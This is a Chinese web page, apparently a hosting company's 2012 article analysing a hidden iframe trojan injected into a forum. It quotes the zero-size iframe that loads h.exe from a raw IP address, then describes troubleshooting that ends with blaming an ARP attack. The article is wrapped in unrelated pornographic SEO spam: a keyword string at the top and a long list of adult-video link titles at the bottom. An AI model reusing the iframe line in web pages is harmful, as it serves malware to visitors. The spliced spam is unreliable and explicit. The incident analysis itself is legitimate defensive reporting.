www一片黄-www一区-www伊人-www淫-少妇被按摩-射在老师的里面真爽

行業(yè)動(dòng)態(tài)
服務(wù)器掛iframe木馬分析
發(fā)布日期:2012-11-26 閱讀次數(shù):5674 字體大小:

  昨日接到某論壇的求助,論壇中被掛iframe木馬,當(dāng)訪問論壇時(shí)發(fā)現(xiàn)每個(gè)頁(yè)面的置頂有個(gè)iframe木馬,代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動(dòng)提示有木馬,系統(tǒng)會(huì)彈出一個(gè)載下h.exe的對(duì)話框。由于論壇是當(dāng)天剛出現(xiàn)的情況,服務(wù)器中就放置了一個(gè)論壇,分析有可能有以下幾種情況。

  1.  論壇被攻擊
  2.  IIS被置入木馬
  3.  ARP攻擊

  針對(duì)第一種情況找到論壇中改過的文件與模板,并未發(fā)現(xiàn)相關(guān)被篡改的內(nèi)容,第一種情況排除。接下來接以下兩種思路來尋找解決方法,在論壇中新建兩個(gè)文件,一個(gè)是1.html、一個(gè)是1.php 無需輸入內(nèi)容。通過論壇網(wǎng)址訪問  網(wǎng)址/1.html 訪問此頁(yè)面沒發(fā)現(xiàn)異常、訪問1.php發(fā)現(xiàn)被自動(dòng)掛馬,也就是說當(dāng)運(yùn)行PHP的文件時(shí)會(huì)自動(dòng)掛馬,那么IIS被置入木馬的可能情就大些,(IIS被置入木馬分析:如PHP解析的文件被篡改,也會(huì)出現(xiàn)以上的情況)按IIS的配置進(jìn)行查找也未發(fā)現(xiàn)問題。

  懷疑可能是服務(wù)器所在的局域網(wǎng)或網(wǎng)絡(luò)有ARP攻擊,從網(wǎng)上下載一個(gè)ARP防火墻后重啟服務(wù)器,發(fā)現(xiàn)問題解決,每個(gè)頁(yè)面中已經(jīng)沒有iframe的木馬。訪問論壇首頁(yè)和原建立的1.php頁(yè)面也已正常。但訪問論壇子頁(yè)時(shí)360仍提示有木馬,但子頁(yè)的代碼已無iframe的內(nèi)容。這種情況可能是論壇訪問過大,多用戶同時(shí)訪問子頁(yè),360有云計(jì)算會(huì)將原有木馬的網(wǎng)站或頁(yè)面自動(dòng)提交到云服務(wù)器中,以致及時(shí)清除木馬后360的云服務(wù)器還沒有反映過來才出現(xiàn)的誤報(bào)情況。

  在些易天科技提示服務(wù)器管理員除作好站點(diǎn)的安全防范外,應(yīng)對(duì)服務(wù)器作相關(guān)的安全設(shè)置。安裝必要的軟件。

主站蜘蛛池模板: 美女一级毛片毛片在线播放 | 立即播放免费毛片一级 | 一级在线观看视频 | 一级毛片免费视频 | 亚洲福利网站 | 99久久中文字幕伊人情人 | 国产免费一区2区3区4区 | 老子影院午夜伦不卡不四虎卡 | 国产亚洲精品综合在线网址 | 久久久久久久网站 | 国产精品久久天天影视 | 特级黄色免费片 | 一级一级一片免费高清 | 亚洲小视频在线播放 | 日本www色视频萌爱网 | 男人和女人日批视频 | 日韩高清的天堂在线观看免费 | 欧美日韩在线国产 | 国产成人综合日韩精品无 | 免费观看一级成人毛片 | 120秒免费| 在线成年视频免费观看 | 亚洲欧美经典 | 亚洲午夜天堂 | 丝袜国产在线 | 999成人网 | 久久精品蜜芽亚洲国产a | 国产1024精品视频专区免费 | 久久精品国产日本波多麻结衣 | 58av国产精品 | 国产精品久久久久一区二区 | 欧美成人免费在线观看 | 日本一区二区三区免费在线观看 | 欧美午夜春性猛交xxxx | 色婷婷婷丁香亚洲综合不卡 | 欧美一区2区三区3区公司 | 黄色小视频观看 | 欧美精品成人 | 一级片aaaa | 欧美日韩精品高清一区二区 | 欧美精品久久一区二区三区 |